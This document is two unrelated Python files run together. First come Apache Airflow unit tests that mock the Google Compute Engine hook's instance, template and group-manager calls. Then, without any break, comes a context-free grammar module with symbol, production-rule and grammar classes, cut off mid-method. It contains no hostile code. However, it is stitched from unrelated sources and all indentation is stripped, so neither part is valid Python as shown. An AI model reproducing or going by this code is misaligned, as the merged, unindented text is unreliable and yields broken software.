#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import unittest
from unittest import mock
from unittest.mock import PropertyMock
import pytest
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.compute import ComputeEngineHook, GceOperationStatus
from tests.providers.google.cloud.utils.base_gcp_mock import (
GCP_PROJECT_ID_HOOK_UNIT_TEST,
mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
GCE_ZONE = 'zone'
GCE_INSTANCE = 'instance'
GCE_INSTANCE_TEMPLATE = 'instance-template'
GCE_REQUEST_ID = 'request_id'
GCE_INSTANCE_GROUP_MANAGER = 'instance_group_manager'
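# Each test below mocks ComputeEngineHook.get_conn and asserts on the chained
# discovery-client calls the hook is expected to make, e.g. (illustrative
# pattern only, not an additional test):
#
#   start_method = get_conn.return_value.instances.return_value.start
#   execute_method = start_method.return_value.execute
#   execute_method.return_value = {"name": "operation_id"}
#
# i.e. the hook should end up calling
# conn.instances().start(...).execute(num_retries=5) and then wait for the
# returned operation to complete.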
class TestGcpComputeHookNoDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__',
new=mock_base_gcp_hook_no_default_project_id,
):
self.gce_hook_no_project_id = ComputeEngineHook(gcp_conn_id='test')
@mock.patch("airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.compute.build")
def test_gce_client_creation(self, mock_build, mock_authorize):
result = self.gce_hook_no_project_id.get_conn()
mock_build.assert_called_once_with(
'compute', 'v1', http=mock_authorize.return_value, cache_discovery=False
)
assert mock_build.return_value == result
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.start_instance(
project_id='example-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.stop_instance(
project_id='example-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_set_machine_type_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
set_machine_type_method = get_conn.return_value.instances.return_value.setMachineType
execute_method = set_machine_type_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.set_machine_type(
body={}, project_id='example-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
set_machine_type_method.assert_called_once_with(
body={}, instance='instance', project='example-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE, project_id='example-project'
)
assert res is not None
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.insert_instance_template(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST, body={}, request_id=GCE_REQUEST_ID
)
assert res is None
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.get_instance_group_manager(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST, zone=GCE_ZONE, resource_id=GCE_INSTANCE_GROUP_MANAGER
)
assert res is not None
get_method.assert_called_once_with(
instanceGroupManager='instance_group_manager', project='example-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_patch_instance_group_manager_overridden_project_id(
self, wait_for_operation_to_complete, get_conn
):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.patch_instance_group_manager(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID,
)
assert res is None
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone',
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
operation_name='operation_id', project_id='example-project', zone='zone'
)
class TestGcpComputeHookDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.gce_hook = ComputeEngineHook(gcp_conn_id='test')
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_start_instance(self, wait_for_operation_to_complete, get_conn, mock_project_id):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(project_id='new-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE)
assert res is None
start_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id', zone='zone'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_stop_instance(self, wait_for_operation_to_complete, get_conn, mock_project_id):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(project_id='new-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE)
assert res is None
stop_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id', zone='zone'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_set_machine_type_instance(self, wait_for_operation_to_complete, get_conn, mock_project_id):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_set_machine_type_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
project_id='new-project', body={}, zone=GCE_ZONE, resource_id=GCE_INSTANCE
)
assert res is None
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id', zone='zone'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_template(self, wait_for_operation_to_complete, get_conn, mock_project_id):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE, project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
assert res is not None
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(project_id='new-project', resource_id=GCE_INSTANCE_TEMPLATE)
assert res is not None
get_method.assert_called_once_with(instanceTemplate='instance-template', project='new-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_insert_instance_template(self, wait_for_operation_to_complete, get_conn, mock_project_id):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
body={},
request_id=GCE_REQUEST_ID,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='example-project', operation_name='operation_id'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
project_id='new-project', body={}, request_id=GCE_REQUEST_ID
)
assert res is None
insert_method.assert_called_once_with(body={}, project='new-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
project_id='new-project', operation_name='operation_id'
)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_group_manager(self, wait_for_operation_to_complete, get_conn, mock_project_id):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is not None
get_method.assert_called_once_with(
instanceGroupManager='instance_group_manager', project='example-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
project_id='new-project', zone=GCE_ZONE, resource_id=GCE_INSTANCE_GROUP_MANAGER
)
assert res is not None
get_method.assert_called_once_with(
instanceGroupManager='instance_group_manager', project='new-project', zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_patch_instance_group_manager(self, wait_for_operation_to_complete, get_conn, mock_project_id):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID,
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
)
assert res is None
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone',
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
operation_name='operation_id', project_id='example-project', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._wait_for_operation_to_complete'
)
def test_patch_instance_group_manager_overridden_project_id(
self, wait_for_operation_to_complete, get_conn
):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID,
)
assert res is None
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='new-project',
requestId='request_id',
zone='zone',
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(
operation_name='operation_id', project_id='new-project', zone='zone'
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._check_global_operation_status'
)
def test_wait_for_operation_to_complete_no_zone(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
num_retries = self.gce_hook.num_retries
# Test success
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
self.gce_hook._wait_for_operation_to_complete(
project_id=project_id, operation_name=operation_name, zone=None
)
mock_operation_status.assert_called_once_with(
service=service, operation_name=operation_name, project_id=project_id, num_retries=num_retries
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch(
'airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._check_global_operation_status'
)
def test_wait_for_operation_to_complete_no_zone_error(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
# Test error
mock_get_conn.return_value = service
mock_operation_status.return_value = {
'status': GceOperationStatus.DONE,
'error': {'errors': "some nasty errors"},
'httpErrorStatusCode': 400,
'httpErrorMessage': 'sample msg',
}
with pytest.raises(AirflowException):
self.gce_hook._wait_for_operation_to_complete(
project_id=project_id, operation_name=operation_name, zone=None
)
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook.get_conn')
@mock.patch('airflow.providers.google.cloud.hooks.compute.ComputeEngineHook._check_zone_operation_status')
def test_wait_for_operation_to_complete_with_zone(self, mock_operation_status, mock_get_conn):
service = "test-service"
project_id = "test-project"
operation_name = "test-operation"
zone = 'west-europe3'
num_retries = self.gce_hook.num_retries
# Test success
mock_get_conn.return_value = service
mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
self.gce_hook._wait_for_operation_to_complete(
project_id=project_id, operation_name=operation_name, zone=zone
)
mock_operation_status.assert_called_once_with(service, operation_name, project_id, zone, num_retries)
'''A Context Free Grammar class along with peripheral classes, data structures,
and algorithms.'''
import itertools
import cgi
from util.tree import Tree
from util.mixin import Comparable, Keyed, Subscripted, Primed
class Symbol(Comparable, Keyed):
'''A base class for symbols which appear in a grammar. Terminal and
Nonterminal classes derive from this.'''
def __init__(self, identifier):
'''Initialize the symbol with a string used to distinguish it.'''
assert isinstance(identifier, str)
self._identifier = identifier
@property
def name(self):
'''Return the symbol's name or identifier.'''
return self._identifier
def is_nonterminal(self):
'''Tell whether this is a nonterminal symbol.'''
raise NotImplementedError()
def is_terminal(self):
'''Tell whether this is a terminal symbol.'''
raise NotImplementedError()
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self._identifier)
def __eq__(self, y):
'''Symbols must be of the same class and have the same identifier to be
considered equal.'''
return (
self.__class__ == y.__class__ and
self._identifier == y._identifier)
def __key__(self):
return (self.sort_num(), self.name)
def sort_num(self):
return 0
def html(self):
'''Return a suitable representation of the object in html.'''
return '<i>%s</i>' % cgi.escape(self.name)
def dot_html(self):
return self.html()
class Nonterminal(Symbol):
'''A class for nonterminal symbols, or variables, in a grammar.'''
def __str__(self):
'''The nonterminal's name appears in angle brackets unless it is a
single capital letter.'''
if len(self.name) != 1 or not self.name.isupper():
return '<%s>' % self.name
return self.name
def is_nonterminal(self):
return True
def is_terminal(self):
return False
def sort_num(self):
return -1
def html(self):
return self._html_interp()
def html_insert(self, html):
return self._html_interp(insert=html)
def html_after(self, html):
return self._html_interp(after=html)
def dot_html(self):
return self._html_interp(dot=True)
def _html_interp(self, insert = '', after = '', dot = False):
if len(self.name) != 1:
return '⟨%s⟩%s%s' % (cgi.escape(self.name), insert, after)
tag = 'i' if dot else 'var'
return '<%s>%s%s</%s>%s' % (tag, cgi.escape(self.name), insert, tag, after)
def _next_unused(original, taken, start, type_):
while True:
result = type_(original, start)
if result in taken: start += 1
else: break
return result
class SubscriptedNonterminal(Subscripted, Nonterminal):
'''A nonterminal with a subscript.'''
def __init__(self, name, subscript):
Subscripted.__init__(self, subscript)
Nonterminal.__init__(self, name)
def __repr__(self):
return 'SubscriptedNonterminal(%r, %r)' % (self.name, self.subscript)
def html(self):
return self.html_after('<sub>%s</sub>' % cgi.escape(str(self.subscript)))
@staticmethod
def next_unused(name, nonterminals):
return _next_unused(name, nonterminals, 1, SubscriptedNonterminal)
class PrimedNonterminal(Primed, Nonterminal):
'''A nonterminal with some number of "prime" marks.'''
def __init__(self, name, num_primes):
Primed.__init__(self, num_primes)
Nonterminal.__init__(self, name)
def __repr__(self):
return 'PrimedNonterminal(%r, %r)' % (self.name, self.num_primes)
def html(self):
if self.num_primes == 2:
primestr = '″' # double prime
elif self.num_primes == 3:
primestr = '‴' # triple prime
elif self.num_primes == 4:
primestr = '⁗' # quadruple prime
else:
primestr = '′' * self.num_primes
return self.html_insert(primestr)
def dot_html(self):
return self._html_interp(insert="'" * self.num_primes, dot=True)
@staticmethod
def next_unused(name, nonterminals):
return _next_unused(name, nonterminals, 1, PrimedNonterminal)
class Terminal(Symbol):
'''A class for terminal symbols in a grammar.'''
def __str__(self):
'''The terminal's identifier appears in double quotes unless it is a
single lowercase letter.'''
if len(self.name) != 1 or self.name.isupper():
return '"%s"' % self.name
return self.name
def is_nonterminal(self):
return False
def is_terminal(self):
return True
def html(self):
return '<code>%s</code>' % (cgi.escape(self.name)) if self.name else '“”'
def dot_html(self):
return '<b>%s</b>' % cgi.escape(self.name)
def sort_num(self):
return 1
class Marker(Terminal):
'''A class for special marker symbols e.g. at the bottom of stacks, the ends
of input tapes, etc. Traditionally represented as $, but may be initialized
with any identifier. It is equal to no terminal symbol.'''
def html(self):
if len(self.name) == 1:
return cgi.escape(self.name)
return Terminal.html(self)
def sort_num(self):
return 3
class Epsilon(Terminal):
def __init__(self):
super(Epsilon, self).__init__('')
def html(self):
return '<i>ε</i>'
def sort_num(self):
return 2
class ProductionRule(object):
'''A class for production rules in a context-free grammar. The left side
must consist of a single variable, and the right side must be a string of
terminals or nonterminals.'''
def __init__(self, left_side, right_side):
'''Initialize the rule with a variable for the left side and a sequence
of symbols for the right side.'''
assert isinstance(left_side, Symbol)
for s in right_side:
assert isinstance(s, Symbol)
self.left_side = left_side
self.right_side = tuple(right_side)
def __str__(self):
'''Represented with arrow notation. The symbols on the right side are
separated by spaces unless all of their string representations are a
single character long.'''
if all(map(lambda x: len(str(x)) == 1, self.right_side)):
sep = ''
else:
sep = ' '
return '%s -> %s' % (self.left_side, sep.join([str(s) for s in \
self.right_side]))
def __repr__(self):
return '%s(%s, %s)' % (self.__class__.__name__, repr(self.left_side), \
repr(self.right_side))
def __eq__(self, o):
'''Tests if the left and right side are equal.'''
return (
isinstance(o, ProductionRule) and
self.left_side == o.left_side and
self.right_side == o.right_side)
def __hash__(self):
return hash((self.left_side, self.right_side))
def _html(self, tohtml):
if self.right_side:
if any(filter(lambda X: isinstance(X, Terminal) and len(X.name) != 1, self.right_side)):
sep = ' '
else:
sep = ''
right = sep.join([tohtml(X) for X in self.right_side])
else:
right = '<i>ε</i>'
return '%s → %s' % (tohtml(self.left_side), right)
def html(self):
return self._html(lambda x: x.html())
def dot_html(self):
return self._html(lambda x: x.dot_html())
class ParseTree(Tree(Symbol)):
'''A class for parse trees or syntax trees.'''
@property
def symbol(self):
'''Return the symbol object at this node.'''
return self.value
class ContextFreeGrammar(object):
def __init__(self, *args):
'''Initialize a context-free grammar in one of three ways:
1. ContextFreeGrammar(string)
The CFG is built from a string listing its production rules which
follows a familiar syntax that allows test CFGs to be specified
quickly and easily. The names of all symbols are one letter long,
and all capital letters are treated as variables. Each line of the
string is of the form
A -> X1 | X2 | ... | Xn
where A is a variable and the Xi are sentential forms. The CFG's
terminal and nonterminal symbols are inferred from the productions
given. The left side of the first rule is made the start variable.
2. ContextFreeGrammar(list)
The CFG is built from a list of production rule objects. The
nonterminals, terminals, and start variable are all inferred from
this listing.
3. ContextFreeGrammar(Nu, Sigma, P, S)
The CFG's nonterminals (Nu), terminals (Sigma), production rules
(P), and start variable (S) are explicitly given and checked for
correctness.'''
if len(args) == 1:
if isinstance(args[0], str):
self._init_string(*args)
else:
self._check_productions(*args)
self._init_productions(*args)
elif len(args) == 4:
self._check_tuple(*args)
self._init_tuple(*args)
else:
raise TypeError('ContextFreeGrammar takes 1 or 4 arguments')
@property
def nonterminals(self):
'''Return a set of the nonterminal symbols which appear in the grammar.
'''
return self._get_symbols_of_type(Nonterminal) | \
set(p.left_side for p in self._productions) | \
self._extra_nonterminals
@property
def terminals(self):
'''Return a set of the terminal symbols which appear in the grammar.'''
return self._get_symbols_of_type(Terminal) | \
self._extra_terminals
@property
def productions(self):
'''Return a list of the productions of the grammar in order.'''
return self._productions
@property
def start(self):
'''Return the grammar's start variable.'''
return self._start
@property
def symbols(self):
'''Return a list of the grammar's nonterminals and terminals.'''
return self.nonterminals | self.terminals
def productions_with_left_side(self, left_side):
'''Return all production rules in the grammar with a certain
symbol on the left side.'''
return filter(lambda x: x.left_side == left_side, self.productions)
def production_dict(self):
'''Return a mapping of variables to the sentences they produce, in
order.'''
result = {n : [] for n in self.nonterminals}
for p in self.productions:
result[p.left_side].append(p.right_side)
return result
def _get_symbols_of_type(self, T):
return set(s for p in self._productions for s in p.right_side \
if isinstance(s, T))
def _init_string(self, string):
